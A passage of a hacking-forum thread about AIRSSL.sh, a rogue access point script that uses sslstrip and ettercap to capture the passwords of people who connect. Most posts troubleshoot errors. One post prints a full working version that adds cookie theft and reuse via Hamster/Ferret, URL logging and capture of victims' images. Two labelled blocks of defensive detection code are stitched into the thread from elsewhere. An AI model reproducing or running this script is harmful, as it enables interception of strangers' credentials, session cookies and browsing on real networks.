
Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #61
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I got an error: can't get IP address!

    I use an Intel 3945ab wireless adapter for receiving internet, and an rtl8187 for the fake AP...
    Does anyone have a solution for this problem?

  2. #62
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    When I run the script I get this error after the airbase is trying to configure at0:

    at0: ERROR while getting interface flags: no such device

    I tried both scripts 1.0, 2.0
    I have a rtl8187, internet adap eth0, fake ap wlan0....

    What am I doing wrong?

    thanks!!!

  3. #63
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello.
    How can I configure the fake AP to use a WPA2 key?
    I try to use a broadband modem (ppp0 interface) as the internet interface, but on the client I can't get an internet connection. Any workaround?

  4. #64
    Just burned his ISO FettMaster's Avatar
    Join Date
    Jan 2011
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, I'm having the following error:

    Code:
    root@bt:~# /root/airssl.sh
    
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    
    0.0.0.0         192.168.2.1     0.0.0.0         UG    0      0        0 eth0
    
    
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    192.168.2.1
    Enter your interface that is connected to the internet, this should be listed above. For example eth1: eth0
    Enter your interface to be used for the fake AP, for example wlan0: wlan0
    Enter the ESSID you would like your rogue AP to be called: Nancy
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    8976    dhclient
    8995    dhclient
    
    
    Interface       Chipset         Driver
    
    wlan0           RTL8187         rtl8187 - [phy0]
                                    (monitor mode enabled on mon6)
    mon0            RTL8187         rtl8187 - [phy0]
    mon1            RTL8187         rtl8187 - [phy0]
    mon2            RTL8187         rtl8187 - [phy0]
    mon3            RTL8187         rtl8187 - [phy0]
    mon4            RTL8187         rtl8187 - [phy0]
    mon5            RTL8187         rtl8187 - [phy0]
    
    [+] Configuring FakeAP....
    
    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?
    
    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    N
    [+] Configuring forwarding tables...
    at0: ERROR while getting interface flags: No such device
    SIOCSIFADDR: No such device
    at0: ERROR while getting interface flags: No such device
    SIOCSIFNETMASK: No such device
    SIOCSIFMTU: No such device
    SIOCADDRT: No such process
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...
    
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    What can be the problem?

    I have my wired network on eth0
    My wireless is wlan0

    Thanks!

  5. #65
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Fettmaster I have the same issue....

  6. #66
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hey, noobie here. I am having problems with airssl.sh. Here are the adapters I am using:

    wlan0 Atheros ath5k - [phy0]
    ra0 Ralink 2560 PCI rt2500


    the ra0 is an alfa AWUS036nh
    the wlan0 is my internet connection

    Here is my problem: I have tried to kill the processes using sudo kill ---
    and they just keep popping up with new process numbers. Also I get the at0 errors seen below. If you need any more info please let me know.

    AIRSSL 2.0 - Credits killadaninja & G60Jon

    0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0


    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    192.168.0.1
    Enter your interface that is connected to the internet, this should be listed above. For example eth1: wlan0
    Enter your interface to be used for the fake AP, for example wlan0: ra0
    Enter the ESSID you would like your rogue AP to be called: mine


    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    11282 wpa_supplicant
    11291 dhclient
    11356 dhclient
    Process with PID 11282 (wpa_supplicant) is running on interface wlan0
    Process with PID 11356 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    ra0 Ralink 2560 PCI rt2500 (monitor mode enabled)

    [+] Configuring FakeAP....

    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?

    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    a

    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    at0: ERROR while getting interface flags: No such device
    SIOCSIFADDR: No such device
    at0: ERROR while getting interface flags: No such device
    SIOCSIFNETMASK: No such device
    SIOCSIFMTU: No such device
    SIOCADDRT: No such process
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...
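
Added example, not part of any post in this thread: the "respond to all probes" mode described in the script prompt quoted above makes one radio answer for whatever network names nearby clients ask for, which a wireless monitor can spot as a single BSSID answering for many ESSIDs. The tab-separated input format, the function names and the sample observations are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. Heuristic for wireless monitoring:
# flag any BSSID that has been seen answering for several different ESSIDs.
# Input (assumed format): one probe-response observation per line,
#   <bssid><TAB><essid>
# as exported from whatever sensor or capture tool the defender runs.

# Print "<bssid> <distinct-essid-count>" for every BSSID at or above the
# threshold (default 3), sorted by BSSID.
flag_multi_essid_bssids() {
    threshold="${1:-3}"
    awk -F'\t' -v min="$threshold" '
        NF < 2 || $2 == "" { next }      # skip malformed rows and empty ESSIDs
        {
            bssid = tolower($1)          # MAC case differs between tools
            key = bssid SUBSEP $2
            if (!(key in seen)) {        # count each (bssid, essid) pair once
                seen[key] = 1
                distinct[bssid]++
            }
        }
        END {
            for (b in distinct)
                if (distinct[b] >= min) print b, distinct[b]
        }' | sort
}

# Constructed sample observations (locally administered MACs, made-up names).
# The first BSSID answers for three unrelated networks; the second behaves
# like an ordinary access point with one ESSID.
sample_observations() {
    printf '%s\t%s\n' \
        '02:00:00:aa:bb:01' 'CoffeeShop' \
        '02:00:00:aa:bb:01' 'HomeNet' \
        '02:00:00:AA:BB:01' 'CoffeeShop' \
        '02:00:00:aa:bb:01' 'AirportFree' \
        '02:00:00:cc:dd:02' 'OfficeWLAN' \
        '02:00:00:cc:dd:02' 'OfficeWLAN' \
        '02:00:00:cc:dd:02' ''
}

sample_observations | flag_multi_essid_bssids 3
```

Legitimate multi-SSID access points normally use a separate BSSID per network name, so the threshold mainly needs tuning for sensors that merge virtual BSSIDs.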

  7. #67
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi all !
    I'm not trying to hijack your thread, but your script inspired me (well, taught me to be more precise) and I made a script of my own, with different means though. It's much simpler and works for local use. I of course gave you credit in the thread that people can find here : http://www.backtrack-linux.org/forum...utomation.html if they're interested !

    Concerning your script I made changes for my own use. For example, why do you use airmon-ng when you could just set your interface to monitor mode ? It worked better for me when using
    Code:
    ifconfig $fakeap_interface down
    iwconfig $fakeap_interface mode monitor
    ifconfig $fakeap_interface up
    I also removed some xwindows that I found to be useless (sslstrip for example).

    Anyway, great work, thanks !

    (Check your PMs) EDIT : or don't, I couldn't send you one due to your box over load I sent it to your "visitor messages"
    Last edited by comaX; 02-06-2011 at 04:01 PM.

  8. #68
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    ::EDIT::

    I messed around a bit with this original scripting and added the option for URL snarf as well as using hamster / ferret to autolog cookies. It works locally, haven't tested it on other machines.

    Here's the pastebin: http://pastebin.com/JxkdHuH6

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
    read -e gatewayip
    echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "
     
    
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # URLSnarf
    echo
    echo "[+] URLSnarf?"
    echo
    echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
    echo "Y or N"
    read URLSN
    if [ $URLSN = "y" ] ; then
    echo
    echo "[+] Starting URLSnarf..."
    xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
    sleep 3
    fi
    
    # Implement Ferret / Hamster for cookies
    echo
    echo "[+] Hamster / Ferret?"
    echo
    echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
    echo
    echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
    echo 
    echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
    echo
    echo "NOTE:  Cookies will be logged, however they will all show up under your local IP address"
    echo "Y or N"
    read HAMSTER
    if [ $HAMSTER = "y" ] ; then
    echo
    echo "[+] Starting Hamster / Ferret..."
    xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
    sleep 1
    xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
    sleep 3
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    kill ${urlsnid}
    kill ${ferretid}
    kill ${hamsterid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit


    Keep in mind that you need to use my modified versions of hamster because for some reason the hamster port was showing up as in use, so I changed the default IP and port #. Just extract the tar to its default folder in /root/ so they would be accessible at /root/moddedhamster/ferret -i eth0 for example. (download them here: http://www.mediafire.com/?7b12zu28185e1wp ) The instructions for hamster will show up when you get to that point.

    Note to OP: If this is against your wishes in any way, let me know and I'll pull the post.

    -Adam
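
Added example, not part of the post above or of airssl.sh: during host triage, the NAT rules this script installs (all UDP sent to the gateway, TCP port 80 redirected to local port 10000, masquerading on the uplink) are a recognisable combination in `iptables-save` output. The function names, verdict labels and both sample rulesets are constructed for illustration; note that `iptables-save` prints the script's `--destination-port` and `--to-port` as `--dport` and `--to-ports`.

```shell
#!/bin/sh
# Added example, not from the thread. Reads `iptables-save` text on stdin and
# reports the NAT rules that match what the posted airssl.sh installs.
find_airssl_nat_rules() {
    awk '
        /^\*/ { table = substr($1, 2); next }       # "*nat", "*filter", ...
        table != "nat" || $1 != "-A" { next }       # only appended NAT rules
        /-p tcp/ && /--dport 80( |$)/ && /-j REDIRECT/ && /--to-ports 10000( |$)/ {
            print "http-redirect-to-10000: " $0; next
        }
        /-p udp/ && /-j DNAT/ && !/--dport/ {       # DNAT of every UDP port
            print "all-udp-dnat: " $0; next
        }
        /-j MASQUERADE/ { print "masquerade: " $0 }
    '
}

# Summarise: MASQUERADE alone is ordinary router behaviour, so the verdict
# keys on the port-80 redirect and on the full three-rule combination.
airssl_ruleset_verdict() {
    findings=$(find_airssl_nat_rules | cut -d: -f1 | sort -u | tr '\n' ' ')
    case "$findings" in
        *all-udp-dnat*http-redirect-to-10000*masquerade*) echo "full-match" ;;
        *http-redirect-to-10000*) echo "partial-match" ;;
        *) echo "no-match" ;;
    esac
}

# Constructed sample: ruleset left behind by the rules in the posted script
# (gateway and interface taken from the session shown earlier in the thread).
sample_suspect_ruleset() {
    cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -j DNAT --to-destination 192.168.2.1
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:FORWARD ACCEPT [0:0]
-A FORWARD -i at0 -j ACCEPT
COMMIT
EOF
}

# Constructed sample: an ordinary NAT gateway with two port forwards.
sample_router_ruleset() {
    cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i eth0 -p tcp -m tcp --dport 8080 -j DNAT --to-destination 192.168.0.10:80
-A PREROUTING -i eth0 -p udp -m udp --dport 1194 -j DNAT --to-destination 192.168.0.10:1194
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
EOF
}

sample_suspect_ruleset | airssl_ruleset_verdict
```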

  9. #69
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    1

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quick question. I have been trying this script over the weekend and wondered if anyone has had any luck with the following scenario. I have my laptop with wlan0 and wlan1; each works in monitor mode / injection mode. wlan1 is an Alfa card, wlan0 is the internal wireless Intel Wireless N 1000. But what happens when I run the script is I use my Windows computer to test to see if it is capturing information and I can't see the network I am broadcasting from wlan1, and I can no longer access the network I am connected to on wlan0, although I can still browse from the machine running the script. Am I too hopeful that this can all be done wirelessly? Or does anyone see any inherent failures in my description here? The script appears to start and run correctly, just no networks. Are you supposed to shut down the other wireless and just use the ethernet?

  10. #70
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    1

    Thumbs up Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Let me say I'm quite impressed with this little one. Here's my experience with it:
    Running Macosx 10.6.6 on 13" Aluminium Unibody Macbook with the following config:
    VM software: VirtualBox 4.0.4
    BT: BT 4 Final
    Internal Airport Wireless: Used for internet access to my home's AP
    External USB Encore Wireless Dongle: FakeAP
    In order to make it work I had to make some minor changes to what I thought would be a straightforward thing.
    1) On the VM, instead of setting the interface as NAT, had to set it as Bridged so it directly connected with my network.
    2) Had to pass control of the USB Wireless Dongle to the VM(obviously)
    3) If I started the script after starting interfaces (/etc/init.d/networking start) this happened:

    Code:
    PID     Name
    5024    dhclient3
    5130    dhclient3
    Process with PID 5130 (dhclient3) is running on interface wlan0
    And DHCP wouldn't work for victims.
    So in order to get it working, had to issue "killall dhclient3" prior to starting the script.

    After this, it worked pretty good, the only problem is that I found it slow and unstable, I'm not sure if I should blame this cheap USB card or the script

    What I still don't find how to fix is after I stop the script by pressing "y" when I want to rerun it it simply won't work. I guess all the housekeeping is not done there, any thoughts?

    Once again I'd like to thank killadaninja for this nifty script.
